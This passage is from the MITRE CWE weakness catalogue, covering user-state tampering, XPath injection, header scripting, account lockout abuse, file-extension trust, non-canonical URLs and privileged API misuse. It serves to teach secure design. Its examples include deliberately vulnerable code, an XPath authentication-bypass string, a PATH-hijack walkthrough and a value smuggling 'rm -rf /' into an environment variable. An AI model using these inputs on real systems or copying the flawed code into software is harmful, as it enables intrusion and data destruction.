CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name, Type + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Filtering of File and Other Resource Names for Executable Content + + + + The product stores security-critical state information about its users, or the product itself, in a location that is accessible to unauthorized actors. + + If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed. + State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an "authenticated=true" cookie. An attacker may simply create this cookie in order to bypass the authentication. + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + High + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + An attacker could potentially modify the state in malicious ways. If the state is related to the privileges or level of authentication that the user has, then state modification might allow the user to bypass authentication or elevate privileges. + + + Confidentiality + Read Application Data + The state variables may contain sensitive information that should not be known by the client. + + + Availability + DoS: Crash, Exit, or Restart + By modifying state variables, the attacker could violate the application's expectations for the contents of the state, leading to a denial of service due to an unexpected error condition. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Understand all the potential locations that are accessible to attackers. For example, some programmers assume that cookies and hidden form fields cannot be modified by an attacker, or they may not consider that environment variables can be modified before a privileged program is invoked. + + + Architecture and Design + Attack Surface Reduction + + Store state information and sensitive data on the server side only. + Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. + If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328). + + + + Architecture and Design + Store state information on the server side only. Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + With a stateless protocol such as HTTP, use some frameworks can maintain the state for you. + Examples include ASP.NET View State and the OWASP ESAPI Session Management feature. + Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Testing + Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Testing + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} + + + + The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). + + String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); + + + + The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. + + fis = new FileInputStream(cfg.getProperty("sub")+".txt");amt = fis.read(arr);out.println(arr); + + + + This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. + + #define DIR "/restricted/directory" + char cmd[500];sprintf(cmd, "ls -l %480s", DIR); + /* Raise privileges to those needed for accessing DIR. */ + + RaisePrivileges(...);system(cmd);DropPrivileges(...);... + + This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. + However, because the program does not modify the PATH environment variable, the following attack would work: + + + The user sets the PATH to reference a directory under the attacker's control, such as "/my/dir/". + The attacker creates a malicious program called "ls", and puts that program in /my/dir + The user executes the program. + When system() is executed, the shell consults the PATH to find the ls program + The program finds the attacker's malicious program, "/my/dir/ls". It doesn't find "/bin/ls" because PATH does not contain "/bin/". + The program executes the attacker's malicious program with the raised privileges. + + + + + The following code segment implements a basic server that uses the "ls" program to perform a directory listing of the directory that is listed in the "HOMEDIR" environment variable. The code intends to allow the user to specify an alternate "LANG" environment variable. This causes "ls" to customize its output based on a given language, which is an important capability when supporting internationalization. + + $ENV{"HOMEDIR"} = "/home/mydir/public/";my $stream = AcceptUntrustedInputStream();while (<$stream>) { + chomp;if (/^ENV ([\w\_]+) (.*)/) {$ENV{$1} = $2;}elsif (/^QUIT/) { ... }elsif (/^LIST/) {open($fh, "/bin/ls -l $ENV{HOMEDIR}|");while (<$fh>) {SendOutput($stream, "FILEINFO: $_");}close($fh);} + } + + The programmer takes care to call a specific "ls" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as "ENV HOMEDIR /secret/directory" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as "/tmp; rm -rf /". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed. + While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors. + + + + + CVE-2005-2428 + Mail client stores password hashes for unrelated accounts in a hidden form field. + https://www.cve.org/CVERecord?id=CVE-2005-2428 + + + CVE-2008-0306 + Privileged program trusts user-specified environment variable to modify critical configuration settings. + https://www.cve.org/CVERecord?id=CVE-2008-0306 + + + CVE-1999-0073 + Telnet daemon allows remote clients to specify critical environment variables for the server, leading to code execution. + https://www.cve.org/CVERecord?id=CVE-1999-0073 + + + CVE-2007-4432 + Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable. + https://www.cve.org/CVERecord?id=CVE-2007-4432 + + + CVE-2006-7191 + Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable. + https://www.cve.org/CVERecord?id=CVE-2006-7191 + + + CVE-2008-5738 + Calendar application allows bypass of authentication by setting a certain cookie value to 1. + https://www.cve.org/CVERecord?id=CVE-2008-5738 + + + CVE-2008-5642 + Setting of a language preference in a cookie enables path traversal attack. + https://www.cve.org/CVERecord?id=CVE-2008-5642 + + + CVE-2008-5125 + Application allows admin privileges by setting a cookie value to "admin." + https://www.cve.org/CVERecord?id=CVE-2008-5125 + + + CVE-2008-5065 + Application allows admin privileges by setting a cookie value to "admin." + https://www.cve.org/CVERecord?id=CVE-2008-5065 + + + CVE-2008-4752 + Application allows admin privileges by setting a cookie value to "admin." + https://www.cve.org/CVERecord?id=CVE-2008-4752 + + + CVE-2000-0102 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0102 + + + CVE-2000-0253 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0253 + + + CVE-2008-1319 + Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded. + https://www.cve.org/CVERecord?id=CVE-2008-1319 + + + + + SFP23 + Exposed Data + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Relevant_Properties, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Management of User State + External Control of User State Data + + + + The product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query. + The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication). + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Bypass Protection Mechanism + Controlling application flow (e.g. bypassing authentication). + + + Confidentiality + Read Application Data + The attacker could read restricted XML content. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Use parameterized XPath queries (e.g. using XQuery). This will help ensure separation between data plane and control plane. + + + Implementation + Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XPath queries is safe in that context. + + + + + Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information: + + <users><user><login>john</login><password>abracadabra</password><home_dir>/home/john</home_dir></user><user><login>cbc</login><password>1mgr8</password><home_dir>/home/cbc</home_dir></user></users> + + The Java code used to retrieve the home directory based on the provided credentials is: + + XPath xpath = XPathFactory.newInstance().newXPath();XPathExpression xlogin = xpath.compile("//users/user[login/text()='" + login.getUserName() + "' and password/text() = '" + login.getPassword() + "']/home_dir/text()");Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File("db.xml"));String homedir = xlogin.evaluate(d); + + Assume that user "john" wishes to leverage XPath Injection and login without a valid password. By providing a username "john" and password "' or ''='" the XPath expression now becomes + + //users/user[login/text()='john' or ''='' and password/text() = '' or ''='']/home_dir/text() + + which, of course, lets user "john" login without a valid password, thus bypassing authentication. + + + + + 39 + XPath Injection + + + SFP24 + Tainted input to command + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database. + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, References, Relationship_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Enabling_Factors_for_Exploitation + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe Treatment of XPath Input + Failure to Sanitize Data within XPath Expressions (aka 'XPath injection') + Failure to Sanitize Data within XPath Expressions ('XPath injection') + + + + The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash. + + An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled. + If a product does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client's browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account. + + + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Run arbitrary code. + + + Confidentiality + Read Application Data + Attackers may be able to obtain sensitive information. + + + + + Architecture and Design + Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header. + + + Architecture and Design + Disable script execution functionality in the clients' browser. + + + + + In the following Java example, user-controlled data is added to the HTTP headers and returned to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser. + + response.addHeader(HEADER_NAME, untrustedRawInputData); + + + + + + CVE-2006-3918 + Web server does not remove the Expect header from an HTTP request when it is reflected back in an error message, allowing a Flash SWF file to perform XSS attacks. + https://www.cve.org/CVERecord?id=CVE-2006-3918 + + + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Observed_Example + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Observed_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Filtering of HTTP Headers for Scripting Syntax + Insufficient Sanitization of HTTP Headers for Scripting Syntax + Improper Sanitization of HTTP Headers for Scripting Syntax + + + + The product contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out. + Account lockout is a security feature often present in applications as a countermeasure to the brute force attack on the password based authentication mechanism of the system. After a certain number of failed login attempts, the users' account may be disabled for a certain period of time or until it is unlocked by an administrator. Other security events may also possibly trigger account lockout. However, an attacker may use this very security feature to deny service to legitimate system users. It is therefore important to ensure that the account lockout security mechanism is not overly restrictive. + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Availability + DoS: Resource Consumption (Other) + Users could be locked out of accounts. + + + + + Architecture and Design + Implement more intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name. + + + Architecture and Design + Implement a lockout timeout that grows as the number of incorrect login attempts goes up, eventually resulting in a complete lockout. + + + Architecture and Design + Consider alternatives to account lockout that would still be effective against password brute force attacks, such as presenting the user machine with a puzzle to solve (makes it do some computation). + + + + + A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Enabling_Factors_for_Exploitation, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion. + An application might use the file name or extension of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a ".php.gif" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself. + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + High + + + Confidentiality + Read Application Data + An attacker may be able to read sensitive data. + + + Availability + DoS: Crash, Exit, or Restart + An attacker may be able to cause a denial of service. + + + Access Control + Gain Privileges or Assume Identity + An attacker may be able to gain privileges. + + + + + Architecture and Design + Make decisions on the server side based on file content and not on file name or extension. + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Observed_Example + + + CWE Content Team + MITRE + 2008-10-13 + Significant clarification of the weakness description. + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Enabling_Factors_for_Exploitation + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Description, Mapping_Notes + + Taking Actions based on File Name or Extension of a User Supplied File + + + + The product defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization. + + If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as: + + http://WWW.EXAMPLE.COM/mypage + http://www.example.com/%6Dypage (alternate encoding) + http://192.168.1.1/mypage (IP address) + http://www.example.com/mypage/ (trailing /) + http://www.example.com:80/mypage + + Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule). + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + High + + + Access Control + Bypass Protection Mechanism + An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL. + + + Confidentiality + Read Files or Directories + If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program). + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form. + + + Architecture and Design + Reject all alternate path encodings that are not in the expected canonical form. + + + + + Example from CAPEC (CAPEC ID: 4, "Using Alternative IP Address Encodings"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions. + + + + + IDS02-J + Canonicalize path names before validating them + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Evgeny Lebanidze + Cigital + 2008-01-30 + Draft 8 + 2008-01-30 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Using Non-Canonical Paths for Authorization Decisions + + + + The product does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly. + + When a product contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to: + + ensure that assumptions made by the APIs are valid, such as validity of arguments + account for known weaknesses in the design/implementation of the API + call the API from a safe context + + If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data. + For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited. + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + Low + + + Access Control + Gain Privileges or Assume Identity + An attacker may be able to elevate privileges. + + + Confidentiality + Read Application Data + An attacker may be able to obtain sensitive information. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + An attacker may be able to execute code. + + + + + Implementation + Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call. + + + Architecture and Design + Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely. + + + Implementation + If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call. + + + Implementation + If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes. + + + Implementation + Only call privileged APIs from safe, consistent and expected state. + + + Implementation + Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges). + + + + + CVE-2003-0645 + A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called. + 